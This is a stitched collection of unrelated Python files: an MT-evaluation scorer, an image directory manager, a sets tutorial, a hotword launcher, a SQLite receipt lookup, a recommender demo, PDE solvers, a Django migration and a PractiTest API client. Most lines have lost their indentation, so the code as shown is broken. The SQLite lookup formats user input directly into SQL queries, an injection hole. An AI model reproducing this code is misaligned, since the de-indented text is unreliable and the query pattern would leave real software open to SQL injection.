padded[i, :lens[i]] = torch.tensor(a, dtype=dtype)
mask[i, :lens[i]] = 1
return padded, lens, mask
def collate_idf(arr, tokenize, numericalize,
pad="[PAD]", device='cuda:0'):
tokens = [["<s>"]+tokenize(a)+["</s>"] for a in arr]
arr = [numericalize(a) for a in tokens]
pad_token = 1
padded, lens, mask = padding(arr, pad_token, dtype=torch.long)
padded = padded.to(device=device)
mask = mask.to(device=device)
lens = lens.to(device=device)
return padded, lens, mask, tokens
def produce_tokens_masks(sent, max_length):
input_ids = tokenizer.convert_tokens_to_ids(create_tokens(sent, None, max_length))
# token_type_ids = [0] * len(input_ids)
attention_mask = [1] * len(input_ids)
pad_token = 1
padding_length = max_length - len(input_ids)
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
return input_ids, attention_mask
def get_embedding(layer, sentences, batch_size= 8):
padded_sens, lens, mask, tokens = collate_idf(sentences,
tokenizer.tokenize,
tokenizer.convert_tokens_to_ids,
device='cuda')
features = {"input_ids": padded_sens, "attention_mask": mask, "token_type_ids": None}
with torch.no_grad():
output_states = model(**features)
all_embeddings = output_states[2][layer]
input_mask = features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(all_embeddings.size()).float()
all_embeddings = all_embeddings * input_mask_expanded
return all_embeddings, mask
def z_norm(inputs):
mean = inputs.mean(0, keepdim=True)
var = inputs.var(0, unbiased=False, keepdim=True)
return (inputs - mean) / torch.sqrt(var + 1e-9)
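# batched_cdist_l2 computes pairwise Euclidean distances per batch using the
# identity ||a - b||^2 = ||a||^2 + ||b||^2 - 2 a.b; baddbmm supplies the
# -2 a.b term and the clamp guards against tiny negative values from rounding.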
def batched_cdist_l2(x1, x2):
x1_norm = x1.pow(2).sum(dim=-1, keepdim=True)
x2_norm = x2.pow(2).sum(dim=-1, keepdim=True)
res = torch.baddbmm(
x2_norm.transpose(-2, -1),
x1,
x2.transpose(-2, -1),
alpha=-2
).add_(x1_norm).clamp_min_(1e-30).sqrt_()
return res
def _safe_divide(numerator, denominator):
return numerator / (denominator + 1e-30)
def optimal_score(layer, refs, hyps, is_norm=False, batch_size=256, device='cuda:0'):
scores = []
for batch_start in range(0, len(refs), batch_size):
batch_refs = refs[batch_start:batch_start+batch_size]
batch_hyps = hyps[batch_start:batch_start+batch_size]
ref_embedding, ref_masks = get_embedding(layer, batch_refs, batch_size)
hyp_embedding, hyp_masks = get_embedding(layer, batch_hyps, batch_size)
ref_idf = ref_masks.float().cpu()
hyp_idf = hyp_masks.float().cpu()
if is_norm:
ref_embedding = z_norm(ref_embedding)
hyp_embedding = z_norm(hyp_embedding)
raw = torch.cat([ref_embedding, hyp_embedding], 1)
raw.div_(torch.norm(raw, dim=-1).unsqueeze(-1) + 1e-30)
distance_matrix = batched_cdist_l2(raw, raw).cpu().numpy().astype('float64')
        for i in range(len(batch_refs)):  # the last batch may be smaller than batch_size
            c1 = np.zeros(raw.shape[1], dtype=float)
c2 = np.zeros_like(c1)
c1[:len(ref_idf[i])] = ref_idf[i]
c2[len(ref_idf[i]):] = hyp_idf[i]
c1 = _safe_divide(c1, np.sum(c1))
c2 = _safe_divide(c2, np.sum(c2))
score = emd(c1, c2, distance_matrix[i])
scores.append(1./(1. + score))
return scores
import pandas as pd
import truecase
from scipy.stats import pearsonr
def pearson_and_spearman(preds, labels):
pearson_corr = pearsonr(preds, labels)[0]
return '{0:.{1}f}'.format(pearson_corr, 3)
from utils import remove_word_contraction, clean_text
import spacy_udpipe
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--src", default='fr', type=str, help="source language")
parser.add_argument("--tgt", default='en', type=str, help="target language")
parser.add_argument("--is_align", default=True, type=bool, help="whether or not joint-alignment is enabled")
parser.add_argument("--model_path", default='../model/xlm-roberta-base_align_lang_18', type=str)
parser.add_argument("--layer", default='-1', type=int, help='in which layer embeddings are obtained')
args = parser.parse_args()
spacy_udpipe.download(args.src)
spacy_udpipe.download(args.tgt)
if not args.is_align:
model_name = 'xlm-roberta-base'
else:
model_name = args.model_path
dataset_path = 'dataset/testset_{}-{}.tsv'.format(args.src, args.tgt)
model = XLMRobertaModel.from_pretrained(model_name, output_hidden_states=True)
tokenizer = XLMRobertaTokenizer.from_pretrained(model_name, do_lower_case=False)
max_seq_length = tokenizer.max_len_single_sentence
device = 'cuda'
model.eval()
model.to('cuda')
data = pd.read_csv(dataset_path, sep='\t')
translations = data['translation'].tolist()
source = data['source'].tolist()
human_score = data['HUMAN_score'].tolist()
sentBLEU = data['sentBLEU'].tolist()
from mosestokenizer import MosesDetokenizer
with MosesDetokenizer(args.src) as detokenize:
source = [detokenize(s.split(' ')) for s in source]
with MosesDetokenizer(args.tgt) as detokenize:
translations = [detokenize(s.split(' ')) for s in translations]
src_udpipe = spacy_udpipe.load(args.src)
tgt_udpipe = spacy_udpipe.load(args.tgt)
translations = [truecase.get_true_case(s) for s in translations]
source_manipulation, _ = remove_word_contraction(src_udpipe, source, args.src)
translations_manipulation, _ = remove_word_contraction(tgt_udpipe, translations, args.tgt)
source = [clean_text(s, args.src) for s in source]
translations = [clean_text(s, args.tgt) for s in translations]
source_manipulation = [clean_text(s, args.src) for s in source_manipulation]
translations_manipulation = [clean_text(s, args.tgt) for s in translations_manipulation]
if not args.is_align:
output_1 = optimal_score(args.layer, source, translations, is_norm=False, batch_size=8) # original
output_2 = optimal_score(args.layer, source, translations, is_norm=True, batch_size=8)# norm_space
output_3 = optimal_score(args.layer, source_manipulation, translations_manipulation, is_norm=False, batch_size=8) # norm_text
else:
output_1 = optimal_score(args.layer, source, translations, is_norm=False, batch_size=8) # align
output_2 = optimal_score(args.layer, source, translations, is_norm=True, batch_size=8)# align + norm_space
output_3 = optimal_score(args.layer, source_manipulation, translations_manipulation, is_norm=True, batch_size=8) # align + norm_space + norm_text
corr_1 = pearson_and_spearman(human_score, output_1)
corr_2 = pearson_and_spearman(human_score, output_2)
corr_3 = pearson_and_spearman(human_score, output_3)
print('layer:{} {}->{}'.format(args.layer, args.src, args.tgt), '{}->{}->{}'.format(corr_1, corr_2, corr_3))
|
from lib.imageManager import ImageManager
import os
import shutil
class DirectoryManager(ImageManager):
"""
This class allows to manage all the categories with directory on the local disk.
"""
def __init__(self):
"""
Initiate the directory manager by creating the directory in data/categories.
"""
# data directory
self.categories_director = 'data/categories'
# Generate data directory if it does not exist
if not os.path.exists(self.categories_director):
os.makedirs(self.categories_director)
def get_all(self):
"""
Get all the images paths.
:return: List of images absolute paths
"""
paths = []
# For each category ask for all its images paths
for cat in self.get_categories():
images = self.get_by_category(cat)
# Concat all the images in the same list
paths.extend(images)
return paths
def get_categories(self):
"""
Get all categories.
:return: List of all categories names
"""
return [name for name in os.listdir(self.categories_director)]
def get_by_category(self, category):
"""
Get images path for the given category.
:param category: Image category
:return: List of all images absolute paths
"""
return [os.path.join(os.path.abspath(self.categories_director), category, f) for f in
os.listdir(os.path.join(self.categories_director, category)) if
os.path.isfile(os.path.join(self.categories_director, category, f))]
def add_category(self, category):
"""
Add a new category.
:param category: Category name
:return: Nothing
"""
os.makedirs(os.path.join(self.categories_director, category))
def delete_category(self, category):
"""
Delete category and all its content.
:param category: Category name
:return: Nothing
"""
shutil.rmtree(os.path.join(self.categories_director, category))
def delete_by_category(self, category, image):
"""
Delete image in the given category. If the image does not exist raise FileNotFoundError.
:param category: Category name
:param image: Image name
:return: Nothing
"""
if os.path.isfile(os.path.join(self.categories_director, category, image)):
os.remove(os.path.join(self.categories_director, category, image))
else:
raise FileNotFoundError
def save(self, image, category):
"""
Add new image to the given category. If the given image's name already exists the image is overwritten.
:param image: Image absolute path
:param category: Category name
:return: Nothing
"""
shutil.copy(image, self.categories_director + '/' + category)
def generate_targets(self, number_of_classes=True):
"""
        Generate targets in the same order as get_all().
        :param number_of_classes: True (default) to build one binary one-vs-rest target list per category (0 for the category itself, 1 for every other category); False to build a single multi-class list with one integer label per category.
        :return: List of classes (if number_of_classes is True the list contains one sub-list per category)
"""
targets = []
if number_of_classes:
for cat in self.get_categories():
classes = []
for c in self.get_categories():
if c != cat:
classes += [1] * len(self.get_by_category(c))
else:
classes += [0] * len(self.get_by_category(c))
targets.append(classes)
else:
for count, cat in enumerate(self.get_categories()):
targets.extend([count] * len(self.get_by_category(cat)))
return targets
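# A minimal usage sketch (hypothetical): get_all() and generate_targets()
# return items in the same order, so paths and labels can be zipped together.
def _directory_manager_example():
    dm = DirectoryManager()
    paths = dm.get_all()
    labels = dm.generate_targets(number_of_classes=False)  # one integer label per category
    return list(zip(paths, labels))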
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 16 16:33:02 2019
@author: chakra
"""
#A set is a collection which is unordered and unindexed.
#In Python sets are written with curly brackets.
thisset = {"apple", "banana", "cherry"}
print(thisset)
#sets are unordered, so you won't know in what order the items will be displayed
#you can't access items by index since sets are unordered
#use a for loop with "in" to access the items
for x in thisset:
    print(x)
#use if and in to check items in set
if "apple" in thisset:
print("apple in set")
else:
print("NO APPLE")
#or you can check with this too
print("banana" in thisset) #will display bollean
#once the SET is created you cannot change the items, but you can add new items.
#to add one items in the set, use add() methods.
#to add more than one method use uodate() methods.
thisset.add("mango")
print(thisset)
#multiple use upadte() and use ([elements here, elementshere])
thisset.update(["kiwi","avacoda","orange"])
print(thisset)
#get the length of the set use len() method
print(len(thisset))
#remove items
#To remove an item in a set, use the remove(), or the discard() method.
thisset.remove("kiwi")
print(thisset)
#if the item to remove does not exist, remove() raises an error, so use discard() instead
thisset.discard("apple")
print(thisset)
#pop() removes an arbitrary item; you can't give an index since sets are unordered.
#the return value is the item that was removed from the set
x=thisset.pop()
print(x)
#the clear() method removes all items from the set; printing it afterwards shows an empty set()
theset = {"apple", "banana", "cherry"}
theset.clear()
print(theset)
#tset = {"apple", "banana", "cherry"}
#del tset
#print(tset)
#Join Two Sets
#there are several ways to join two or more sets in Python.
#You can use the union() method that returns a new set containing all items-
# from both sets, or the update() method that inserts all the items from one set into another:
#The union() method returns a new set with all items from both sets:
set1 = {"a", "b" , "c"}
set2 = {1, 2, 3}
set3 = set1.union(set2)
print(set3)
#The update() method inserts the items in set2 into set1:
set1 = {"a", "b" , "c"}
set2 = {1, 2, 3}
set1.update(set2)
print(set1)
#The set() Constructor
#It is also possible to use the set() constructor to make a set.
#Using the set() constructor to make a set:
thisset = set(("apple", "banana", "cherry")) # note the double round-brackets
print(thisset)
#-----------------------------------------------------------------------------------------------
'''Set Methods
Python has a set of built-in methods that you can use on sets.
Method Description
add() Adds an element to the set
clear() Removes all the elements from the set
copy() Returns a copy of the set
difference() Returns a set containing the difference between two or more sets
difference_update() Removes the items in this set that are also included in another, specified set
discard() Remove the specified item
intersection() Returns a set, that is the intersection of two other sets
intersection_update() Removes the items in this set that are not present in other, specified set(s)
isdisjoint()	Returns whether two sets have an intersection or not
issubset() Returns whether another set contains this set or not
issuperset() Returns whether this set contains another set or not
pop() Removes an element from the set
remove() Removes the specified element
symmetric_difference() Returns a set with the symmetric differences of two sets
symmetric_difference_update() inserts the symmetric differences from this set and another
union() Return a set containing the union of sets
update() Update the set with the union of this set and others'''
|
import dex2
import sys
import signal
interrupted = False
def signal_handler(signal, frame):
global interrupted
interrupted = True
def interrupt_callback():
global interrupted
return interrupted
#Specify the model obtained from Snowboy website
if len(sys.argv) == 1:
print("MODEL NOT SPECIFIED")
print("Please specify model with .pmdl or .umdl extension after python file")
sys.exit(-1)
model = sys.argv[1]
#To capture signal such as keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
#Higher sensitivity increases the detection rate but also the chance of false alarms
detector = dex2.HotwordDetector(model, sensitivity=0.5)
print('Speak a keyword(computer) to initialize')
#The program checks for the hotword every 0.03 seconds
detector.start(detected_callback=dex2.perform,
interrupt_check=interrupt_callback,
sleep_time=0.03)
detector.terminate()
|
import sqlite3
from datetime import date, timedelta
database = "C:\Program Files\lonchepos1.1.0_w10\database.db"
connection = sqlite3.connect(database)
cursor = connection.cursor()
def fetchData(folio):
query = "SELECT total, hora, nombre, notas FROM tickets WHERE folio = '{}';".format(folio)
cursor.execute(query)
ticket = cursor.fetchall()[0]
query = "SELECT producto, cantidad FROM ticketProducts WHERE folio = '{}';".format(folio)
cursor.execute(query)
ticketProducts = cursor.fetchall()
return [ticket, ticketProducts]
while True:
folio = input("ESCRIBE EL FOLIO QUE QUIERES CHECAR: ")
data = fetchData(folio)
print("FOLIO: {}".format(folio))
print("TOTAL: {}".format(data[0][0]))
print("HORA: {}".format(data[0][1]))
print("")
print("NOMBRE: {}".format(data[0][2]))
print("NOTAS: {}".format(data[0][3]))
print("")
print("PRODUCTOS: ")
for i in range(len(data[1])):
print(data[1][i])
print("________________________________________")
|
#!/usr/bin/env python
import sys
import os
from flavorite import Recommender
from combosaurus import load_data
from datetime import datetime
def find_closest_demo():
data = load_data('../data/dump_interests.tsv',
'../data/dump_ratings_small.tsv')
item_data = data['item_data']
recom = Recommender()
recom.build(item_data)
return recom.find_closest('doctor-who', 10)
def save_load_demo():
data = load_data('../data/dump_interests.tsv',
'../data/dump_ratings_small.tsv')
item_data = data['item_data']
recom = Recommender()
recom.build(item_data)
print 'Saving to `recom.pkl`...'
recom.save('recom.pkl')
recom2 = Recommender()
print 'Loading back...'
recom2.load('recom.pkl')
os.remove('recom.pkl')
print 'Done.'
def load_sim_demo():
recom = Recommender()
recom.load('recom.pkl')
print recom.similarity('doctor-who', 'torchwood')
def build_and_save(filename):
print '[', datetime.now(), '] loading data...'
data = load_data('../data/dump_interests.tsv',
'../data/dump_ratings.tsv')
print '[', datetime.now(), '] forcing item data to be loaded...'
item_data = list(data['item_data'])
print '[', datetime.now(), '] building recommender...'
recom = Recommender()
recom.build(item_data)
recom.save(filename)
print 'Done.'
if __name__ == '__main__':
if len(sys.argv) > 1:
cmd = sys.argv[1]
if cmd == 'build_and_save':
build_and_save(sys.argv[2])
elif cmd == 'find_closest':
find_closest_demo()
elif cmd == 'save_load':
save_load_demo()
elif cmd == 'load_sim':
load_sim_demo()
else:
print 'No such command'
else:
print 'Usage: python demo.py cmd [args]'
|
import numpy as np
#perform an explicit march using the Euler approximation
def eulerstep(input,grid,t,f,delta):
new=[]
#get shape of input
row,col=input[0].shape
#create a new array to contain the new time step
for i in range(0,len(input)):
array=np.zeros([row,col],float)
new.append(array)
    #for each element in the new arrays we need a value at x,y
#or i j in matrix notation
for i in range(0,row):
for j in range(0,col):
n=0
X=[i,j]
for matrix in new:
matrix[i,j]=f[n](X,grid,input,delta)
n+=1
return new
def eulerstep1d(input,grid,t,f,delta):
new=[]
#get shape of input
row=len(input[0])
#create a new array to contain the new time step
for i in range(0,len(input)):
array=np.zeros([row],float)
new.append(array)
    #for each element in the new arrays we need a value at x
    #or i in vector notation
for i in range(0,row):
n=0
X=[i]
for matrix in new:
matrix[i]=f[n](X,grid,input,delta)
n+=1
return new
def multipdesys1D(Lm,grid,f,a,b,dt):
t=[]
#find the difference in the grid in the x and y direction
dx=abs(grid[0][0]-grid[0][1])
#creates a list of deltas so we can easily call dt,dx, and dy
delta=[dt,dx]
#create a dictionary that will contain
# a list of arrays for each variable in the odesolversystem
#for example if we had a coupled system u and v
# X contain two list one for u and one for v
# each element in these lists is a matrix containing all the x,y positions
#where the last element in the list corresponds to the final time step
X=dict()
#create a index for number of coupled systems
n=len(Lm)
for i in range(0,n):
#create a key for each system in the coupled system
key=str(i)
X[key]=[Lm[i]]
check=0
while a<b:
#add to t list which is the list of time steps
t.append(a)
input=[]
new=[]
#pulls the last time step from each list in the dictionary
for list in X:
#this creates the array that is fed into the Euler system algorithm
input.append(X[list][-1])
#performs euler step and returns a matrix for each
#variable in the coupled system
new=eulerstep1d(input,grid,t[-1],f,delta)
i=0
        #for every list in X we append the new time march
for list in X:
#appends the output to the list
X[list].append(new[i])
i=i+1
a=a+dt
check+=1
# X will be a dictionary of lists each list will contain arrays corresponding
# to the 2d grid that progressed in time
return X,t
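#for a coupled system (u, v) the returned X looks like
#   {"0": [u_t0, u_t1, ...], "1": [v_t0, v_t1, ...]}
#where each entry is the full spatial array at one time step and t is the
#list of time values visited during the march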
#solve a pde system in 2 dimensions
def multipdesys2dEE(Lm,grid,f,a,b,dt):
t=[]
    # find the grid spacing in the x and y directions
dx=abs(grid[0][0,0]-grid[0][1,0])
dy=abs(grid[1][0,0]-grid[1][0,1])
#creates a list of deltas so we can easily call dt,dx, and dy
delta=[dt,dx,dy]
    # create a dictionary that will contain a list of arrays for each variable
    # in the coupled system. For example, for a coupled system u and v,
    # X contains two lists, one for u and one for v; each element in these
    # lists is a matrix over all the x,y positions, and the last element in
    # each list corresponds to the final time step.
X=dict()
    # count the number of coupled equations
n=len(Lm)
for i in range(0,n):
#create a key for each system in the coupled system
key=str(i)
X[key]=[Lm[i]]
check=0
while a<b:
#add to t list which is the list of time steps
t.append(a)
input=[]
new=[]
#pulls the last time step from each list in the dictionary
for list in X:
#this creates the array that is fed into the Euler system algorithm
input.append(X[list][-1])
#performs euler step and returns a matrix for each
#variable in the coupled system
new=eulerstep(input,grid,t[-1],f,delta)
i=0
        # for every list in X we append the new time march
for list in X:
#appends the output to the list
X[list].append(new[i])
i=i+1
a=a+dt
check+=1
# X will be a dictionary of lists each list will contain arrays corresponding
# to the 2d grid that progressed in time
return X,t
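# Usage note (added): the 2D right-hand-side callables follow the same
# convention as the 1D ones but receive X = [i, j] and delta = [dt, dx, dy];
# f[n](X, grid, input, delta) must return the updated value of variable n at
# grid point (i, j).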
# a is the lower diagonal
# b is the main diagonal
# c is the upper diagonal
# d is the right-hand-side vector being solved for
def TDMAsolver(a, b, c, d):
'''
TDMA solver, a b c d can be NumPy array type or Python list type.
refer to http://en.wikipedia.org/wiki/Tridiagonal_matrix_algorithm
and to http://www.cfd-online.com/Wiki/Tridiagonal_matrix_algorithm_-_TDMA_(Thomas_algorithm)
'''
nf = len(d) # number of equations
ac, bc, cc, dc = map(np.array, (a, b, c, d)) # copy arrays
for it in range(1, nf):
mc = ac[it-1]/bc[it-1]
bc[it] = bc[it] - mc*cc[it-1]
dc[it] = dc[it] - mc*dc[it-1]
xc = bc
xc[-1] = dc[-1]/bc[-1]
for il in range(nf-2, -1, -1):
xc[il] = (dc[il]-cc[il]*xc[il+1])/bc[il]
return xc
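# Worked example (added; values are assumed, not from the original code): for
# the tridiagonal system
#   [2 1 0] [x0]   [4]
#   [1 2 1] [x1] = [8]
#   [0 1 2] [x2]   [8]
# TDMAsolver([1.0, 1.0], [2.0, 2.0, 2.0], [1.0, 1.0], [4.0, 8.0, 8.0])
# returns approximately [1.0, 2.0, 3.0]. Inputs are given as floats here so
# the in-place NumPy updates are not truncated to integers.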
def implicithelp(input,grid,t,f,fI,delta):
row,col=input[0].shape
dmatrix=[]
for i in range(0,len(input)):
array=np.zeros([row,col],float)
dmatrix.append(array)
for i in range(0,row):
for j in range(0,col):
n=0
X=[i,j]
for matrix in dmatrix:
matrix[i,j]=f[n](X,grid,input,delta)
n+=1
return dmatrix
def diag(input,grid,delta,f):
row,col=input[0].shape
A=[]
B=[]
C=[]
i=0
for matrix in input:
a,b,c=f[i](row,grid,delta)
a=np.array(a)
b=np.array(b)
c=np.array(c)
A.append(a)
B.append(b)
C.append(c)
i+=1
return [A,B,C]
def impliciteulerstepT(input,grid,t,f,g,fIx,fIy,delta,flip):
new=[]
    # create the tridiagonal matrices for the x march and the y march
    # a is the lower diagonal
    # b is the main diagonal
    # c is the upper diagonal
ax,bx,cx=diag(input,grid,[delta[0],delta[1]],fIx)
ay,by,cy=diag(input,grid,[delta[0],delta[2]],fIy)
row,col=input[0].shape
#we create an array of zeros to fill with new information
for i in range(0,len(input)):
array=np.zeros([row,col],float)
new.append(array)
#check in which order to perform the explicit and implicit march
if(flip%2!=0):
dmatrix1=implicithelp(input,grid,t,f,fIy,delta)
for j in range(0,col):
n=0
for matrix in new:
ans=TDMAsolver(ax[n],bx[n],cx[n],dmatrix1[n][:,j])
matrix[:,j]=ans
n+=1
dmatrix2=implicithelp(new,grid,t,g,fIx,delta)
for i in range(0,row):
n=0
for matrix in new:
ans=TDMAsolver(ay[n],by[n],cy[n],dmatrix2[n][i,:])
matrix[i,:]=ans
n+=1
return new
#check in which order to perform the explicit and implicit march
else:
dmatrix1=implicithelp(input,grid,t,g,fIx,delta)
for i in range(0,row):
n=0
for matrix in new:
ans=TDMAsolver(ay[n],by[n],cy[n],dmatrix1[n][i,:])
matrix[i,:]=ans
n+=1
dmatrix2=implicithelp(new,grid,t,f,fIy,delta)
for j in range(0,col):
n=0
for matrix in new:
ans=TDMAsolver(ax[n],bx[n],cx[n],dmatrix2[n][:,j])
matrix[:,j]=ans
n+=1
return new
# f is the right-hand side when marching in the x direction in ADI
# g is the right-hand side when marching in the y direction in ADI
# fIx builds the diagonals of the left-hand side for the x direction
# fIy builds the diagonals of the left-hand side for the y direction
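# Note (added, hedged): multipdesys2dIET below appears to implement an
# alternating-direction-implicit (ADI) style scheme: delta carries half time
# steps (dt/2), and `flip` alternates on every step whether the x sweep or the
# y sweep is solved implicitly first.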
def multipdesys2dIET(Lm,grid,f,g,fIx,fIy,a,b,dt):
t=[]
flip=0
#find the difference in the grid in the x and y direction
dx=abs(grid[0][0,0]-grid[0][1,0])
dy=abs(grid[1][0,0]-grid[1][0,1])
delta=[dt/2,dx,dy]
X=dict()
n=len(Lm)
for i in range(0,n):
key=str(i)
X[key]=[Lm[i]]
check=0
while a<b:
flip+=1
t.append(a)
input=[]
new=[]
for list in X:
#this creates the array that is fed into the Euler system algorithm
input.append(X[list][-1])
new=impliciteulerstepT(input,grid,t[-1],f,g,fIx,fIy,delta,flip)
if(check==0):
print("this is n ="+ str(check))
print(input)
if(check>10 and check<20 ):
print("this is n ="+ str(check))
print(new)
i=0
for list in X:
#appends the output to the list
X[list].append(new[i])
i=i+1
a=a+dt
check+=1
return X,t
|
# Generated by Django 3.1.5 on 2021-01-07 13:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Maker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='メーカー')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='機種')),
('release_date', models.DateField(verbose_name='発売日')),
('maker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stock_manager.maker', verbose_name='メーカー')),
],
),
migrations.CreateModel(
name='SmartPhone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('storage', models.IntegerField(verbose_name='データ容量(GB)')),
('color', models.TextField(verbose_name='色')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='smartphone', to='stock_manager.product', verbose_name='機種')),
],
),
migrations.CreateModel(
name='Stock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.TextField(verbose_name='OSバージョン')),
('price', models.IntegerField(verbose_name='販売価格(円)')),
('prd', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stock', to='stock_manager.smartphone', verbose_name='機種')),
],
),
]
|
from base64 import b64encode
import base64
import datetime
from collections import OrderedDict
import json, csv, sys, os
from re import split
import re, requests
import localSettings
from localSettings import *
from logger import *
from utilityTestFunc import *
#=============================================================================================================
# The class contains functions that manage PractiTest integration with the automation framework
#=============================================================================================================
class clsPractiTest:
#=============================================================================================================
# Function that returns all instances of a specific session
#=============================================================================================================
def getPractiTestSessionInstances(self, prSessionInfo):
prSessionID = prSessionInfo["sessionSystemID"]
defaultPlatform = prSessionInfo["setPlatform"]
runOnlyFailed = prSessionInfo["runOnlyFailed"].lower()
sessionInstancesDct = {}
page = 1
while True:
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/instances.json?set-ids=" + str(prSessionID) + "&developer_email=" + LOCAL_SETTINGS_DEVELOPER_EMAIL + "&page[number]=" + str(page) + "&api_token=" + LOCAL_SETTINGS_PRACTITEST_API_TOKEN
# For next iteration
page = page + 1
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if (len(dctSets["data"]) > 0):
for testInstance in dctSets["data"]:
# '---f-34162' = 'Execute Automated'
# testInstance['attributes']['custom-fields']['---f-30772'] - Platform(CH, FF..)
# Check if test has specified platform, if not, use default platform
try:
platform = testInstance['attributes']['custom-fields']['---f-30772']
except Exception:
platform = defaultPlatform
try:
executeAutomated = testInstance['attributes']['custom-fields']['---f-34162']
except Exception:
executeAutomated = 'No'
# Run only FAILED tests:
toRun = True
if runOnlyFailed == 'yes':
if not testInstance['attributes']['run-status'].lower() == 'failed':
toRun = False
if executeAutomated == 'Yes' and toRun == True:
sessionInstancesDct[testInstance["attributes"]["test-display-id"]] = testInstance["id"] + ";" + platform
writeToLog("INFO","Found test with id: " + str(testInstance["attributes"]["test-display-id"]))
else:
writeToLog("INFO","No instances in set. " + r.text)
break
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
break
return sessionInstancesDct
#=============================================================================================================
# Function that returns all sessions that are located under the filter "pending for automation"
#=============================================================================================================
def getPractiTestAutomationSession(self):
#FOR DEBUG, DON'T REMOVE
# PractiTest filter ID:
# qaKmsFrontEnd = 326139
filterId = os.getenv('PRACTITEST_FILTER_ID',"")
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/sets.json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL) + "&filter-id=" + str(filterId)
prSessionInfo = {
"sessionSystemID" : -1,
"sessionDisplayID" : -1,
"setPlatform" : "",
"environment" : "",
"hostname" : "",
"runOnlyFailed" : ""
}
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if len(dctSets["data"]) != 0:
if (dctSets["data"][0]["attributes"]["instances-count"] > 0):
prSessionInfo["sessionSystemID"] = dctSets["data"][0]["id"]
prSessionInfo["sessionDisplayID"] = dctSets["data"][0]["attributes"]["display-id"]
prSessionInfo["setPlatform"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-30772'] #PractiTest Field: Automation Platform
prSessionInfo["environment"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-30761'] #PractiTest Field: Automation Env
prSessionInfo["hostname"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-34785'] #PractiTest Field: Run On Hostname
prSessionInfo["runOnlyFailed"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-38033'] #PractiTest Field: Automation Run Only FAILED
writeToLog("INFO","Automation set found: " + str(prSessionInfo["sessionDisplayID"]) + " on platform: " + prSessionInfo["setPlatform"])
else:
writeToLog("INFO","No automated sessions found.")
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
return prSessionInfo
#=============================================================================================================
# Function that returns specific test set by ID
#=============================================================================================================
def getPractiTestSetById(self, testSetId):
# testSetId = '367544'
page = '1'
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/instances.json?set-ids=" + str(testSetId) + "&developer_email=" + LOCAL_SETTINGS_DEVELOPER_EMAIL + "&page[number]=" + str(page) + "&api_token=" + LOCAL_SETTINGS_PRACTITEST_API_TOKEN
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if len(dctSets["data"]) != 0:
writeToLog("INFO","Automation Test Set found, id: '" + str(testSetId)+ "'; Display ID: '" + str(dctSets["data"][0]["attributes"]["set-display-id"]) + "'")
return dctSets["data"]
else:
writeToLog("INFO","No test found in Test Set: '" + str(testSetId) + "'")
else:
writeToLog("INFO","Bad response for get PractiTest Set By Id: " + r.text)
return
#=============================================================================================================
    # Function that goes over the data (all tests in the test set)
# practiTestFieldId - example: "---f-38302"
#=============================================================================================================
def syncTestSetData(self, testSet, csvPath, practiTestFieldId):
listCsv = open(csvPath).readlines()
testSetData = self.getPractiTestSetById(testSet['id'])
for testPractitest in testSetData:
testDisplayId = str(testPractitest["attributes"]["test-display-id"])
for testCsv in listCsv:
if testDisplayId == testCsv.split(',')[0]:
if str(testCsv.split(',')[1]) != '\n':
#Update the test: instanceId, customFieldId, customFieldValue
self.updateInstanceCustomField(str(testPractitest['id']), practiTestFieldId, str(testCsv.split(',')[1]).replace('\n',''))
writeToLog("INFO", "Updated TestSet '" + str(testSet['id']) + "', Test ID '" + testDisplayId + "', Filed ID '" + practiTestFieldId + "', New Value: " + str(testCsv.split(',')[1]))
return
#=============================================================================================================
# Function that returns all tests sets that are located under the given filter
#=============================================================================================================
def getPractiTestTestSetByFilterId(self, filterId):
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/sets.json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL) + "&filter-id=" + str(filterId)
listTestSet = []
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
